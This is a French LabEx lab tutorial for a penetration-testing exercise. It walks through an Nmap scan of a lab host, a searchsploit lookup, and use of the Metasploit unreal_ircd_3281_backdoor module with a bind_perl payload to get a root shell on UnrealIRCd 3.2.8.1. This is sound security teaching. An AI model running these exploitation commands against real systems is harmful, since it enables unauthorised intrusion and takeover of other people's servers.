LabEx
EntrerRejoindre

Utiliser Nmap pour scanner et exploiter les vulnérabilités d'un hôte cible

NmapBeginner
Pratiquer maintenant

Introduction

Le scan réseau est une discipline extrêmement pratique. Grâce au scan réseau, les utilisateurs peuvent découvrir les ports assignés à divers services sur l'hôte cible, les services ouverts, les logiciels de service et leurs versions, ainsi que d'autres informations.

Dans ce laboratoire, vous apprendrez à scanner les vulnérabilités de sécurité des services réseau d'un hôte cible.

Utiliser Nmap pour scanner les ports ouverts sur l'hôte cible

Le flux de travail de base du scan réseau est le suivant :

  1. Découverte de l'hôte cible
  2. Scan des ports
  3. Scan des empreintes (fingerprinting)
  4. Scan des vulnérabilités
  5. Exécution d'attaques par pénétration

Nmap (Network Mapper) est un outil de scan réseau puissant. Il prend en charge diverses techniques de scan, telles que UDP, TCP connect(), TCP SYN (scan semi-ouvert), proxy FTP (attaque par rebond), reverse flag, ICMP, FIN, ACK, SYN et le scan nul.

Dans cette étape, vous utiliserez Nmap pour scanner les ports ouverts sur l'hôte cible. La configuration du laboratoire a déjà démarré le service vulnérable à l'adresse 192.168.122.102, votre scan devrait donc trouver un hôte actif au lieu de signaler que la cible est hors ligne.

  1. Ouvrez un terminal et entrez dans le conteneur Kali :
docker run -ti --network host b5b709a49cd5 bash
  1. Utilisez la commande nmap pour scanner l'hôte cible 192.168.122.102 :
nmap -p 6667 -T4 -A -v 192.168.122.102 > /tmp/report.txt

Cette commande scanne le port 6667 sur l'hôte cible, utilise une politique de temporisation plus rapide, active la détection de version et enregistre la sortie dans /tmp/report.txt.

Analyser les résultats du scan

Après avoir scanné l'hôte cible, vous devez analyser les résultats pour identifier les vulnérabilités potentielles.

  1. Affichez le rapport de scan :
cat /tmp/report.txt

Cette commande affiche le contenu du fichier /tmp/report.txt, qui contient des informations sur les ports ouverts, les services et les versions sur l'hôte cible. Un scan réussi devrait montrer que l'hôte est actif et que le port 6667 est ouvert, comme dans l'exemple suivant :

Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-23 15:28 UTC
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:28
Completed NSE at 15:28, 0.00s elapsed
Discovered open port 6667/tcp on 192.168.122.102
Nmap scan report for 192.168.122.102
Host is up.

PORT     STATE SERVICE VERSION
6667/tcp open  irc     UnrealIRCd 3.2.8.1

Service Info: Host: labex-target
  1. Utilisez l'outil searchsploit pour rechercher des informations sur les vulnérabilités :
searchsploit unreal ircd

Cette commande recherche dans l'Exploit Database les vulnérabilités liées au service "unreal ircd". Voici un exemple de ce que vous pourriez voir :

---------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                  |  Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)                                                    | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow                                                         | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute                                                                  | linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service                                                                       | windows/dos/27407.pl
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
  1. Affichez les détails d'une vulnérabilité :
cat /usr/share/exploitdb/exploits/linux/remote/16922.rb

Cette commande affiche le contenu du fichier d'exploitation de la vulnérabilité situé à /usr/share/exploitdb/exploits/linux/remote/16922.rb.

Exploiter une vulnérabilité

Après avoir analysé les résultats du scan et identifié les vulnérabilités potentielles, vous pouvez tenter d'exploiter une vulnérabilité pour mener une attaque par pénétration.

  1. Identifiez une vulnérabilité exploitable à partir des résultats du scan. Par exemple, supposons que le scan ait trouvé un port 6667 ouvert avec un service vulnérable.

  2. Démarrez le framework Metasploit :

cd ~
msfconsole
  1. Dans la console Metasploit, sélectionnez le module d'exploitation approprié :
use exploit/unix/irc/unreal_ircd_3281_backdoor
  1. Définissez l'adresse IP de l'hôte cible :
set RHOST 192.168.122.102
  1. Définissez le payload :
set PAYLOAD cmd/unix/bind_perl
  1. Lancez l'exploitation :
exploit

Si l'exploitation réussit, vous obtiendrez un accès à l'hôte cible.

  1. Après avoir tenté d'exploiter une vulnérabilité, vous devez vérifier si l'exploitation a réussi. Dans la session Metasploit, vérifiez l'utilisateur actuel et le nom d'hôte :
whoami

hostname

Si la sortie indique que vous êtes connecté en tant qu'utilisateur root, l'exploitation a réussi. Dans ce laboratoire, le service vulnérable s'exécute dans un espace de noms réseau isolé sur la machine virtuelle de formation, donc la sortie de hostname affichera le nom d'hôte de la machine virtuelle LabEx actuelle plutôt que le nom d'une machine invitée distincte.

Appuyez sur Ctrl+D pour quitter la console Metasploit, puis lancez l'inspection.

Résumé

Dans ce laboratoire, vous avez appris le flux de travail de base du scan réseau, qui comprend la découverte de l'hôte cible, le scan des ports, le scan des empreintes, le scan des vulnérabilités et l'exécution d'attaques par pénétration. Vous avez utilisé le puissant outil Nmap pour scanner les ports ouverts sur l'hôte cible et analysé les résultats pour identifier les vulnérabilités potentielles. De plus, vous avez appris à rechercher des informations sur les vulnérabilités à l'aide de l'outil searchsploit et à exploiter une vulnérabilité à l'aide du framework Metasploit. Enfin, vous avez vérifié le succès de l'exploitation en vérifiant l'utilisateur actuel et le nom d'hôte sur l'hôte cible.

Grâce à ce laboratoire pratique, vous avez acquis une expérience concrète dans le scan des vulnérabilités de sécurité des services réseau et dans la réalisation d'attaques par pénétration. Ces connaissances sont cruciales pour assurer la sécurité des systèmes réseau et identifier les risques potentiels.

Connexe Nmap Cours
Nmap pour les débutants

Nmap pour les débutants

cybersecuritynmaplinux
Atelier de numérisation réseau avec Nmap sur Linux

Atelier de numérisation réseau avec Nmap sur Linux

cybersecuritynmaplinux
Analyse Nmap et Accès Telnet

Analyse Nmap et Accès Telnet

cybersecuritynmaplinux